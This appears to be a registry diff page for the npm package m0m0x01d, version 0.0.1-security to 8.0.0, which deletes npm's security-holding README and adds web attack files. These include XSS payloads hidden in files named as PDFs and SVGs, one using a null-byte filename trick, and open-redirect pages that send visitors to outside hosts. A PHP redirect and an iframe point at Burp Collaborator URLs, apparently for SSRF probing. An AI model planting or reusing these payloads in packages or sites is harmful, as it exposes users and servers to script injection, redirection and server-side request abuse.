m0m0x01d 0.0.1-security → 8.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of m0m0x01d might be problematic. Click here for more details.
- package/.htaccess +8 -0
- package/file.html +13 -0
- package/package.json +8 -3
- package/redirect.svg.html +25 -0
- package/redirect.svg.php +21 -0
- package/redirect2.svg.html +11 -0
- package/test.html%00.pdf +1 -0
- package/test.pdf +0 -0
- package/test.pdf.txt +1 -0
- package/test.php +3 -0
- package/test.svg.html +1 -0
- package/test.svg.txt +1 -0
- package/test.txt +1 -0
- package/test.txt.pdf +1 -0
- package/test2.txt.pdf +1 -0
- package/testing.svg.html +1 -0
- package/xss.svg.html +4 -0
- package/xss1.svg.html +6 -0
- package/README.md +0 -5
package/.htaccess
ADDED
package/file.html
ADDED
|
@@ -0,0 +1,13 @@
|
|
|
1
|
+
<!DOCTYPE html>
|
|
2
|
+
<html lang="en">
|
|
3
|
+
<head>
|
|
4
|
+
<meta charset="UTF-8">
|
|
5
|
+
<meta http-equiv="X-UA-Compatible" content="IE=edge">
|
|
6
|
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
|
7
|
+
<title>Redirecting...</title>
|
|
8
|
+
<meta http-equiv="refresh" content="0; url=https://40fe2e9f7b.ipv6.bypass.eu.org/">
|
|
9
|
+
</head>
|
|
10
|
+
<body>
|
|
11
|
+
<p>If you are not redirected automatically, <a href="https://40fe2e9f7b.ipv6.bypass.eu.org/">click here</a>.</p>
|
|
12
|
+
</body>
|
|
13
|
+
</html>
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "m0m0x01d",
|
|
3
|
-
"version": "0.0
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "8.0.0",
|
|
4
|
+
"description": "ssrf",
|
|
5
|
+
"main": "index.html",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "ls"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
|
@@ -0,0 +1,25 @@
|
|
|
1
|
+
<!DOCTYPE html>
|
|
2
|
+
<html lang="en">
|
|
3
|
+
<head>
|
|
4
|
+
<meta charset="UTF-8">
|
|
5
|
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
|
6
|
+
<title>Redirect</title>
|
|
7
|
+
<script>
|
|
8
|
+
window.onload = function() {
|
|
9
|
+
// Get the URL query parameter
|
|
10
|
+
const urlParams = new URLSearchParams(window.location.search);
|
|
11
|
+
const targetUrl = urlParams.get('url');
|
|
12
|
+
|
|
13
|
+
// If a valid URL is provided, redirect to it
|
|
14
|
+
if (targetUrl) {
|
|
15
|
+
window.location.href = targetUrl;
|
|
16
|
+
} else {
|
|
17
|
+
document.body.innerHTML = "No URL provided for redirection.";
|
|
18
|
+
}
|
|
19
|
+
}
|
|
20
|
+
</script>
|
|
21
|
+
</head>
|
|
22
|
+
<body>
|
|
23
|
+
</body>
|
|
24
|
+
</html>
|
|
25
|
+
|
package/redirect.svg.php
ADDED
|
@@ -0,0 +1,21 @@
|
|
|
1
|
+
<?php
|
|
2
|
+
// Get the target URL from the 'next_url' query parameter
|
|
3
|
+
$next_url = isset($_GET['next_url']) ? $_GET['next_url'] : 'https://9lv13zw73wdy5t6hjxcpw5tz9qfh36.burpcollaborator.net';
|
|
4
|
+
|
|
5
|
+
// Set the appropriate headers for the 302 redirect
|
|
6
|
+
header("HTTP/1.1 302 Found");
|
|
7
|
+
header("Location: $next_url");
|
|
8
|
+
|
|
9
|
+
// Optional: Set additional headers if required
|
|
10
|
+
header("Cache-Control: public, max-age=0");
|
|
11
|
+
header("Set-Cookie: sites=; expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; Path=/");
|
|
12
|
+
header("Set-Cookie: sessionid=; expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; Path=/");
|
|
13
|
+
header("Strict-Transport-Security: max-age=31536000; includeSubDomains; preload");
|
|
14
|
+
header("X-Frame-Options: SAMEORIGIN");
|
|
15
|
+
header("X-XSS-Protection: 1; mode=block");
|
|
16
|
+
header("X-Content-Type-Options: nosniff");
|
|
17
|
+
header("Content-Security-Policy: frame-ancestors 'self'; base-uri 'self'; form-action 'self' https://*.example.com; upgrade-insecure-requests");
|
|
18
|
+
|
|
19
|
+
// Ensure the connection is closed after the headers
|
|
20
|
+
exit();
|
|
21
|
+
|
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
<!DOCTYPE html>
|
|
2
|
+
<html lang="en">
|
|
3
|
+
<head>
|
|
4
|
+
<meta charset="UTF-8">
|
|
5
|
+
<meta http-equiv="refresh" content="0; url=https://www.example.com">
|
|
6
|
+
<title>Redirecting...</title>
|
|
7
|
+
</head>
|
|
8
|
+
<body>
|
|
9
|
+
<p>If you are not redirected automatically, follow this <a href="https://www.example.com">link to the new page</a>.</p>
|
|
10
|
+
</body>
|
|
11
|
+
</html>
|
package/test.html%00.pdf
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
<script>alert(document.domain)</script>
|
package/test.pdf
ADDED
|
Binary file
|
package/test.pdf.txt
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
testing
|
package/test.php
ADDED
package/test.svg.html
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
<script>alert(document.domain)</script>
|
package/test.svg.txt
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
testing123
|
package/test.txt
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
testing m0m0x01d
|
package/test.txt.pdf
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
testing123
|
package/test2.txt.pdf
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
<script>alert(1)</script>
|
package/testing.svg.html
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
<iframe src="https://wttobm4ubjlldge4rkkc4s1mhdn3bs.burpcollaborator.net"></iframe>
|
package/xss.svg.html
ADDED
package/xss1.svg.html
ADDED
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=m0m0x01d for more information.
|